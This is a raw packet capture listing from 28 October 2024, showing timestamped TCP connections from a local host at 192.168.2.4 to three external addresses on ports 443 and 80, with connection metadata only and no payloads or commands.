                                              Oct 28, 2024 19:04:29.087488890 CET44349746188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:29.087511063 CET44349746188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:29.087577105 CET49746443192.168.2.4188.132.193.46
                                              Oct 28, 2024 19:04:29.087589025 CET44349746188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:29.087635040 CET49746443192.168.2.4188.132.193.46
                                              Oct 28, 2024 19:04:29.174139977 CET44349746188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:29.174159050 CET44349746188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:29.174274921 CET49746443192.168.2.4188.132.193.46
                                              Oct 28, 2024 19:04:29.174284935 CET44349746188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:29.174338102 CET49746443192.168.2.4188.132.193.46
                                              Oct 28, 2024 19:04:29.188983917 CET44349752188.114.97.3192.168.2.4
                                              Oct 28, 2024 19:04:29.190706968 CET49752443192.168.2.4188.114.97.3
                                              Oct 28, 2024 19:04:29.190731049 CET44349752188.114.97.3192.168.2.4
                                              Oct 28, 2024 19:04:29.294382095 CET44349746188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:29.294405937 CET44349746188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:29.294514894 CET49746443192.168.2.4188.132.193.46
                                              Oct 28, 2024 19:04:29.294537067 CET44349746188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:29.294593096 CET49746443192.168.2.4188.132.193.46
                                              Oct 28, 2024 19:04:29.327990055 CET44349746188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:29.328013897 CET44349746188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:29.328138113 CET49746443192.168.2.4188.132.193.46
                                              Oct 28, 2024 19:04:29.328151941 CET44349746188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:29.328239918 CET49746443192.168.2.4188.132.193.46
                                              Oct 28, 2024 19:04:29.353343964 CET44349752188.114.97.3192.168.2.4
                                              Oct 28, 2024 19:04:29.353414059 CET44349752188.114.97.3192.168.2.4
                                              Oct 28, 2024 19:04:29.353486061 CET49752443192.168.2.4188.114.97.3
                                              Oct 28, 2024 19:04:29.354043007 CET49752443192.168.2.4188.114.97.3
                                              Oct 28, 2024 19:04:29.415493965 CET44349746188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:29.415524006 CET44349746188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:29.415745020 CET49746443192.168.2.4188.132.193.46
                                              Oct 28, 2024 19:04:29.415760040 CET44349746188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:29.415813923 CET49746443192.168.2.4188.132.193.46
                                              Oct 28, 2024 19:04:29.450953960 CET44349746188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:29.450979948 CET44349746188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:29.451061964 CET49746443192.168.2.4188.132.193.46
                                              Oct 28, 2024 19:04:29.451071978 CET44349746188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:29.451121092 CET49746443192.168.2.4188.132.193.46
                                              Oct 28, 2024 19:04:29.536501884 CET44349746188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:29.536521912 CET44349746188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:29.536592960 CET49746443192.168.2.4188.132.193.46
                                              Oct 28, 2024 19:04:29.536604881 CET44349746188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:29.536652088 CET49746443192.168.2.4188.132.193.46
                                              Oct 28, 2024 19:04:29.985794067 CET44349746188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:29.985809088 CET44349746188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:29.985843897 CET44349746188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:29.985915899 CET49746443192.168.2.4188.132.193.46
                                              Oct 28, 2024 19:04:29.985929966 CET44349746188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:29.985970974 CET49746443192.168.2.4188.132.193.46
                                              Oct 28, 2024 19:04:29.985996008 CET49746443192.168.2.4188.132.193.46
                                              Oct 28, 2024 19:04:29.986219883 CET44349746188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:29.986234903 CET44349746188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:29.986304998 CET49746443192.168.2.4188.132.193.46
                                              Oct 28, 2024 19:04:29.986310959 CET44349746188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:29.986357927 CET49746443192.168.2.4188.132.193.46
                                              Oct 28, 2024 19:04:29.989063025 CET44349746188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:29.989084005 CET44349746188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:29.989165068 CET49746443192.168.2.4188.132.193.46
                                              Oct 28, 2024 19:04:29.989171028 CET44349746188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:29.989214897 CET49746443192.168.2.4188.132.193.46
                                              Oct 28, 2024 19:04:29.991902113 CET44349746188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:29.991918087 CET44349746188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:29.992053032 CET49746443192.168.2.4188.132.193.46
                                              Oct 28, 2024 19:04:29.992059946 CET44349746188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:29.992147923 CET49746443192.168.2.4188.132.193.46
                                              Oct 28, 2024 19:04:29.993798971 CET44349746188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:29.993814945 CET44349746188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:29.993894100 CET49746443192.168.2.4188.132.193.46
                                              Oct 28, 2024 19:04:29.993901014 CET44349746188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:29.993946075 CET49746443192.168.2.4188.132.193.46
                                              Oct 28, 2024 19:04:29.996309042 CET44349746188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:29.996331930 CET44349746188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:29.996403933 CET49746443192.168.2.4188.132.193.46
                                              Oct 28, 2024 19:04:29.996412039 CET44349746188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:29.996454000 CET49746443192.168.2.4188.132.193.46
                                              Oct 28, 2024 19:04:30.017277002 CET44349746188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:30.017299891 CET44349746188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:30.017416000 CET49746443192.168.2.4188.132.193.46
                                              Oct 28, 2024 19:04:30.017429113 CET44349746188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:30.017487049 CET49746443192.168.2.4188.132.193.46
                                              Oct 28, 2024 19:04:30.050331116 CET44349746188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:30.050379038 CET44349746188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:30.050560951 CET49746443192.168.2.4188.132.193.46
                                              Oct 28, 2024 19:04:30.050570965 CET44349746188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:30.050622940 CET49746443192.168.2.4188.132.193.46
                                              Oct 28, 2024 19:04:30.137383938 CET44349746188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:30.137439013 CET44349746188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:30.137536049 CET49746443192.168.2.4188.132.193.46
                                              Oct 28, 2024 19:04:30.137548923 CET44349746188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:30.137597084 CET49746443192.168.2.4188.132.193.46
                                              Oct 28, 2024 19:04:30.138972998 CET44349746188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:30.139014959 CET44349746188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:30.139070034 CET49746443192.168.2.4188.132.193.46
                                              Oct 28, 2024 19:04:30.139076948 CET44349746188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:30.139095068 CET49746443192.168.2.4188.132.193.46
                                              Oct 28, 2024 19:04:30.139127970 CET49746443192.168.2.4188.132.193.46
                                              Oct 28, 2024 19:04:30.220727921 CET44349746188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:30.220793962 CET44349746188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:30.220844984 CET49746443192.168.2.4188.132.193.46
                                              Oct 28, 2024 19:04:30.220854998 CET44349746188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:30.220873117 CET49746443192.168.2.4188.132.193.46
                                              Oct 28, 2024 19:04:30.220901966 CET49746443192.168.2.4188.132.193.46
                                              Oct 28, 2024 19:04:30.258754969 CET44349746188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:30.258774042 CET44349746188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:30.258853912 CET49746443192.168.2.4188.132.193.46
                                              Oct 28, 2024 19:04:30.258862972 CET44349746188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:30.258910894 CET49746443192.168.2.4188.132.193.46
                                              Oct 28, 2024 19:04:30.293663979 CET44349746188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:30.293684006 CET44349746188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:30.293745995 CET49746443192.168.2.4188.132.193.46
                                              Oct 28, 2024 19:04:30.293756962 CET44349746188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:30.293771029 CET49746443192.168.2.4188.132.193.46
                                              Oct 28, 2024 19:04:30.293801069 CET49746443192.168.2.4188.132.193.46
                                              Oct 28, 2024 19:04:30.378562927 CET44349746188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:30.378586054 CET44349746188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:30.378660917 CET49746443192.168.2.4188.132.193.46
                                              Oct 28, 2024 19:04:30.378680944 CET44349746188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:30.378730059 CET49746443192.168.2.4188.132.193.46
                                              Oct 28, 2024 19:04:30.411355019 CET44349746188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:30.411372900 CET44349746188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:30.411447048 CET49746443192.168.2.4188.132.193.46
                                              Oct 28, 2024 19:04:30.411457062 CET44349746188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:30.411485910 CET49746443192.168.2.4188.132.193.46
                                              Oct 28, 2024 19:04:30.411510944 CET49746443192.168.2.4188.132.193.46
                                              Oct 28, 2024 19:04:30.498584986 CET44349746188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:30.498655081 CET44349746188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:30.498733997 CET49746443192.168.2.4188.132.193.46
                                              Oct 28, 2024 19:04:30.498744011 CET44349746188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:30.498790979 CET49746443192.168.2.4188.132.193.46
                                              Oct 28, 2024 19:04:30.498806953 CET49746443192.168.2.4188.132.193.46
                                              Oct 28, 2024 19:04:30.569680929 CET44349746188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:30.569708109 CET44349746188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:30.569818974 CET49746443192.168.2.4188.132.193.46
                                              Oct 28, 2024 19:04:30.569834948 CET44349746188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:30.569886923 CET49746443192.168.2.4188.132.193.46
                                              Oct 28, 2024 19:04:31.030155897 CET44349746188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:31.030173063 CET44349746188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:31.030194998 CET44349746188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:31.030289888 CET49746443192.168.2.4188.132.193.46
                                              Oct 28, 2024 19:04:31.030314922 CET44349746188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:31.030376911 CET49746443192.168.2.4188.132.193.46
                                              Oct 28, 2024 19:04:31.184497118 CET44349746188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:31.184530973 CET44349746188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:31.184704065 CET49746443192.168.2.4188.132.193.46
                                              Oct 28, 2024 19:04:31.184717894 CET44349746188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:31.184766054 CET49746443192.168.2.4188.132.193.46
                                              Oct 28, 2024 19:04:31.491882086 CET44349746188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:31.491910934 CET44349746188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:31.492055893 CET49746443192.168.2.4188.132.193.46
                                              Oct 28, 2024 19:04:31.492074966 CET44349746188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:31.492141962 CET49746443192.168.2.4188.132.193.46
                                              Oct 28, 2024 19:04:31.651447058 CET44349746188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:31.651469946 CET44349746188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:31.651629925 CET49746443192.168.2.4188.132.193.46
                                              Oct 28, 2024 19:04:31.651629925 CET49746443192.168.2.4188.132.193.46
                                              Oct 28, 2024 19:04:31.651640892 CET44349746188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:31.651684999 CET49746443192.168.2.4188.132.193.46
                                              Oct 28, 2024 19:04:31.799889088 CET44349746188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:31.799925089 CET44349746188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:31.799978971 CET49746443192.168.2.4188.132.193.46
                                              Oct 28, 2024 19:04:31.799995899 CET44349746188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:31.800050020 CET49746443192.168.2.4188.132.193.46
                                              Oct 28, 2024 19:04:31.801220894 CET44349746188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:31.801239967 CET44349746188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:31.801315069 CET49746443192.168.2.4188.132.193.46
                                              Oct 28, 2024 19:04:31.801321983 CET44349746188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:31.801372051 CET49746443192.168.2.4188.132.193.46
                                              Oct 28, 2024 19:04:32.226561069 CET44349746188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:32.226576090 CET44349746188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:32.226598024 CET44349746188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:32.226672888 CET49746443192.168.2.4188.132.193.46
                                              Oct 28, 2024 19:04:32.226691961 CET44349746188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:32.226725101 CET49746443192.168.2.4188.132.193.46
                                              Oct 28, 2024 19:04:32.226752996 CET49746443192.168.2.4188.132.193.46
                                              Oct 28, 2024 19:04:32.227271080 CET44349746188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:32.227291107 CET44349746188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:32.227330923 CET49746443192.168.2.4188.132.193.46
                                              Oct 28, 2024 19:04:32.227339029 CET44349746188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:32.227375031 CET49746443192.168.2.4188.132.193.46
                                              Oct 28, 2024 19:04:32.227390051 CET49746443192.168.2.4188.132.193.46
                                              Oct 28, 2024 19:04:32.227777958 CET44349746188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:32.227803946 CET44349746188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:32.227842093 CET49746443192.168.2.4188.132.193.46
                                              Oct 28, 2024 19:04:32.227848053 CET44349746188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:32.227902889 CET49746443192.168.2.4188.132.193.46
                                              Oct 28, 2024 19:04:32.264297009 CET44349746188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:32.264319897 CET44349746188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:32.264389992 CET49746443192.168.2.4188.132.193.46
                                              Oct 28, 2024 19:04:32.264395952 CET44349746188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:32.264436007 CET49746443192.168.2.4188.132.193.46
                                              Oct 28, 2024 19:04:32.264458895 CET49746443192.168.2.4188.132.193.46
                                              Oct 28, 2024 19:04:32.265887022 CET44349746188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:32.265904903 CET44349746188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:32.265980959 CET49746443192.168.2.4188.132.193.46
                                              Oct 28, 2024 19:04:32.265986919 CET44349746188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:32.266026020 CET49746443192.168.2.4188.132.193.46
                                              Oct 28, 2024 19:04:32.266046047 CET49746443192.168.2.4188.132.193.46
                                              Oct 28, 2024 19:04:32.417042017 CET44349746188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:32.417073011 CET44349746188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:32.417165995 CET49746443192.168.2.4188.132.193.46
                                              Oct 28, 2024 19:04:32.417177916 CET44349746188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:32.417228937 CET49746443192.168.2.4188.132.193.46
                                              Oct 28, 2024 19:04:32.418018103 CET44349746188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:32.418037891 CET44349746188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:32.418091059 CET49746443192.168.2.4188.132.193.46
                                              Oct 28, 2024 19:04:32.418097019 CET44349746188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:32.418126106 CET49746443192.168.2.4188.132.193.46
                                              Oct 28, 2024 19:04:32.418154001 CET49746443192.168.2.4188.132.193.46
                                              Oct 28, 2024 19:04:32.570040941 CET44349746188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:32.570065975 CET44349746188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:32.570158005 CET49746443192.168.2.4188.132.193.46
                                              Oct 28, 2024 19:04:32.570172071 CET44349746188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:32.570223093 CET49746443192.168.2.4188.132.193.46
                                              Oct 28, 2024 19:04:32.570720911 CET44349746188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:32.570746899 CET44349746188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:32.570784092 CET49746443192.168.2.4188.132.193.46
                                              Oct 28, 2024 19:04:32.570790052 CET44349746188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:32.570837975 CET49746443192.168.2.4188.132.193.46
                                              Oct 28, 2024 19:04:32.571400881 CET44349746188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:32.571420908 CET44349746188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:32.571485043 CET49746443192.168.2.4188.132.193.46
                                              Oct 28, 2024 19:04:32.571491003 CET44349746188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:32.571536064 CET49746443192.168.2.4188.132.193.46
                                              Oct 28, 2024 19:04:32.724226952 CET44349746188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:32.724248886 CET44349746188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:32.724366903 CET49746443192.168.2.4188.132.193.46
                                              Oct 28, 2024 19:04:32.724379063 CET44349746188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:32.724422932 CET49746443192.168.2.4188.132.193.46
                                              Oct 28, 2024 19:04:32.725163937 CET44349746188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:32.725183010 CET44349746188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:32.725347996 CET49746443192.168.2.4188.132.193.46
                                              Oct 28, 2024 19:04:32.725353956 CET44349746188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:32.725416899 CET49746443192.168.2.4188.132.193.46
                                              Oct 28, 2024 19:04:32.844095945 CET44349746188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:32.844124079 CET44349746188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:32.844206095 CET49746443192.168.2.4188.132.193.46
                                              Oct 28, 2024 19:04:32.844218016 CET44349746188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:32.844259977 CET49746443192.168.2.4188.132.193.46
                                              Oct 28, 2024 19:04:32.844283104 CET49746443192.168.2.4188.132.193.46
                                              Oct 28, 2024 19:04:32.878138065 CET44349746188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:32.878160000 CET44349746188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:32.878220081 CET49746443192.168.2.4188.132.193.46
                                              Oct 28, 2024 19:04:32.878227949 CET44349746188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:32.878271103 CET49746443192.168.2.4188.132.193.46
                                              Oct 28, 2024 19:04:32.878297091 CET49746443192.168.2.4188.132.193.46
                                              Oct 28, 2024 19:04:32.878942013 CET44349746188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:32.878962040 CET44349746188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:32.879014015 CET49746443192.168.2.4188.132.193.46
                                              Oct 28, 2024 19:04:32.879019976 CET44349746188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:32.879057884 CET49746443192.168.2.4188.132.193.46
                                              Oct 28, 2024 19:04:32.879086971 CET49746443192.168.2.4188.132.193.46
                                              Oct 28, 2024 19:04:32.998028994 CET44349746188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:32.998059034 CET44349746188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:32.998162985 CET49746443192.168.2.4188.132.193.46
                                              Oct 28, 2024 19:04:32.998178959 CET44349746188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:32.998233080 CET49746443192.168.2.4188.132.193.46
                                              Oct 28, 2024 19:04:33.030900002 CET44349746188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:33.030920982 CET44349746188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:33.031017065 CET49746443192.168.2.4188.132.193.46
                                              Oct 28, 2024 19:04:33.031023979 CET44349746188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:33.031044960 CET44349746188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:33.031068087 CET49746443192.168.2.4188.132.193.46
                                              Oct 28, 2024 19:04:33.031073093 CET44349746188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:33.031119108 CET44349746188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:33.031120062 CET49746443192.168.2.4188.132.193.46
                                              Oct 28, 2024 19:04:33.031171083 CET49746443192.168.2.4188.132.193.46
                                              Oct 28, 2024 19:04:33.034703016 CET49746443192.168.2.4188.132.193.46
                                              Oct 28, 2024 19:04:34.055002928 CET4975380192.168.2.4132.226.247.73
                                              Oct 28, 2024 19:04:34.060623884 CET8049753132.226.247.73192.168.2.4
                                              Oct 28, 2024 19:04:34.060714006 CET4975380192.168.2.4132.226.247.73
                                              Oct 28, 2024 19:04:34.060961008 CET4975380192.168.2.4132.226.247.73
                                              Oct 28, 2024 19:04:34.066338062 CET8049753132.226.247.73192.168.2.4
                                              Oct 28, 2024 19:04:34.912925959 CET8049753132.226.247.73192.168.2.4
                                              Oct 28, 2024 19:04:34.917491913 CET4975380192.168.2.4132.226.247.73
                                              Oct 28, 2024 19:04:34.923095942 CET8049753132.226.247.73192.168.2.4
                                              Oct 28, 2024 19:04:35.172844887 CET8049753132.226.247.73192.168.2.4
                                              Oct 28, 2024 19:04:35.210861921 CET49754443192.168.2.4188.114.97.3
                                              Oct 28, 2024 19:04:35.210894108 CET44349754188.114.97.3192.168.2.4
                                              Oct 28, 2024 19:04:35.210971117 CET49754443192.168.2.4188.114.97.3
                                              Oct 28, 2024 19:04:35.215816975 CET49754443192.168.2.4188.114.97.3
                                              Oct 28, 2024 19:04:35.215831041 CET44349754188.114.97.3192.168.2.4
                                              Oct 28, 2024 19:04:35.218856096 CET4975380192.168.2.4132.226.247.73
                                              Oct 28, 2024 19:04:35.867651939 CET44349754188.114.97.3192.168.2.4
                                              Oct 28, 2024 19:04:35.867788076 CET49754443192.168.2.4188.114.97.3
                                              Oct 28, 2024 19:04:35.869541883 CET49754443192.168.2.4188.114.97.3
                                              Oct 28, 2024 19:04:35.869549036 CET44349754188.114.97.3192.168.2.4
                                              Oct 28, 2024 19:04:35.869971991 CET44349754188.114.97.3192.168.2.4
                                              Oct 28, 2024 19:04:35.917526007 CET49754443192.168.2.4188.114.97.3
                                              Oct 28, 2024 19:04:35.959367037 CET44349754188.114.97.3192.168.2.4
                                              Oct 28, 2024 19:04:36.075131893 CET44349754188.114.97.3192.168.2.4
                                              Oct 28, 2024 19:04:36.075351954 CET44349754188.114.97.3192.168.2.4
                                              Oct 28, 2024 19:04:36.075597048 CET49754443192.168.2.4188.114.97.3
                                              Oct 28, 2024 19:04:36.078221083 CET49754443192.168.2.4188.114.97.3
                                              Oct 28, 2024 19:04:36.081614017 CET4975380192.168.2.4132.226.247.73
                                              Oct 28, 2024 19:04:36.087187052 CET8049753132.226.247.73192.168.2.4
                                              Oct 28, 2024 19:04:36.338349104 CET8049753132.226.247.73192.168.2.4
                                              Oct 28, 2024 19:04:36.340836048 CET49755443192.168.2.4188.114.97.3
                                              Oct 28, 2024 19:04:36.340914965 CET44349755188.114.97.3192.168.2.4
                                              Oct 28, 2024 19:04:36.341020107 CET49755443192.168.2.4188.114.97.3
                                              Oct 28, 2024 19:04:36.341379881 CET49755443192.168.2.4188.114.97.3
                                              Oct 28, 2024 19:04:36.341418028 CET44349755188.114.97.3192.168.2.4
                                              Oct 28, 2024 19:04:36.390779018 CET4975380192.168.2.4132.226.247.73
                                              Oct 28, 2024 19:04:36.985598087 CET44349755188.114.97.3192.168.2.4
                                              Oct 28, 2024 19:04:36.990958929 CET49755443192.168.2.4188.114.97.3
                                              Oct 28, 2024 19:04:36.991031885 CET44349755188.114.97.3192.168.2.4
                                              Oct 28, 2024 19:04:37.154939890 CET44349755188.114.97.3192.168.2.4
                                              Oct 28, 2024 19:04:37.154997110 CET44349755188.114.97.3192.168.2.4
                                              Oct 28, 2024 19:04:37.155152082 CET49755443192.168.2.4188.114.97.3
                                              Oct 28, 2024 19:04:37.155555010 CET49755443192.168.2.4188.114.97.3
                                              Oct 28, 2024 19:04:37.159027100 CET4975380192.168.2.4132.226.247.73
                                              Oct 28, 2024 19:04:37.160343885 CET4975680192.168.2.4132.226.247.73
                                              Oct 28, 2024 19:04:37.164701939 CET8049753132.226.247.73192.168.2.4
                                              Oct 28, 2024 19:04:37.164782047 CET4975380192.168.2.4132.226.247.73
                                              Oct 28, 2024 19:04:37.165682077 CET8049756132.226.247.73192.168.2.4
                                              Oct 28, 2024 19:04:37.165781021 CET4975680192.168.2.4132.226.247.73
                                              Oct 28, 2024 19:04:37.165872097 CET4975680192.168.2.4132.226.247.73
                                              Oct 28, 2024 19:04:37.171443939 CET8049756132.226.247.73192.168.2.4
                                              Oct 28, 2024 19:04:38.034620047 CET8049756132.226.247.73192.168.2.4
                                              Oct 28, 2024 19:04:38.036828041 CET49757443192.168.2.4188.114.97.3
                                              Oct 28, 2024 19:04:38.036880016 CET44349757188.114.97.3192.168.2.4
                                              Oct 28, 2024 19:04:38.036962032 CET49757443192.168.2.4188.114.97.3
                                              Oct 28, 2024 19:04:38.037239075 CET49757443192.168.2.4188.114.97.3
                                              Oct 28, 2024 19:04:38.037257910 CET44349757188.114.97.3192.168.2.4
                                              Oct 28, 2024 19:04:38.078355074 CET4975680192.168.2.4132.226.247.73
                                              Oct 28, 2024 19:04:38.679750919 CET44349757188.114.97.3192.168.2.4
                                              Oct 28, 2024 19:04:38.681421995 CET49757443192.168.2.4188.114.97.3
                                              Oct 28, 2024 19:04:38.681449890 CET44349757188.114.97.3192.168.2.4
                                              Oct 28, 2024 19:04:38.845911026 CET44349757188.114.97.3192.168.2.4
                                              Oct 28, 2024 19:04:38.846080065 CET44349757188.114.97.3192.168.2.4
                                              Oct 28, 2024 19:04:38.846147060 CET49757443192.168.2.4188.114.97.3
                                              Oct 28, 2024 19:04:38.846697092 CET49757443192.168.2.4188.114.97.3
                                              Oct 28, 2024 19:04:38.851125002 CET4975880192.168.2.4132.226.247.73
                                              Oct 28, 2024 19:04:38.856590986 CET8049758132.226.247.73192.168.2.4
                                              Oct 28, 2024 19:04:38.856700897 CET4975880192.168.2.4132.226.247.73
                                              Oct 28, 2024 19:04:38.856770992 CET4975880192.168.2.4132.226.247.73
                                              Oct 28, 2024 19:04:38.862140894 CET8049758132.226.247.73192.168.2.4
                                              Oct 28, 2024 19:04:39.731909037 CET8049758132.226.247.73192.168.2.4
                                              Oct 28, 2024 19:04:39.733306885 CET49759443192.168.2.4188.114.97.3
                                              Oct 28, 2024 19:04:39.733352900 CET44349759188.114.97.3192.168.2.4
                                              Oct 28, 2024 19:04:39.733454943 CET49759443192.168.2.4188.114.97.3
                                              Oct 28, 2024 19:04:39.733707905 CET49759443192.168.2.4188.114.97.3
                                              Oct 28, 2024 19:04:39.733728886 CET44349759188.114.97.3192.168.2.4
                                              Oct 28, 2024 19:04:39.781366110 CET4975880192.168.2.4132.226.247.73
                                              Oct 28, 2024 19:04:40.356816053 CET44349759188.114.97.3192.168.2.4
                                              Oct 28, 2024 19:04:40.358911037 CET49759443192.168.2.4188.114.97.3
                                              Oct 28, 2024 19:04:40.358947992 CET44349759188.114.97.3192.168.2.4
                                              Oct 28, 2024 19:04:40.531429052 CET44349759188.114.97.3192.168.2.4
                                              Oct 28, 2024 19:04:40.531501055 CET44349759188.114.97.3192.168.2.4
                                              Oct 28, 2024 19:04:40.531653881 CET49759443192.168.2.4188.114.97.3
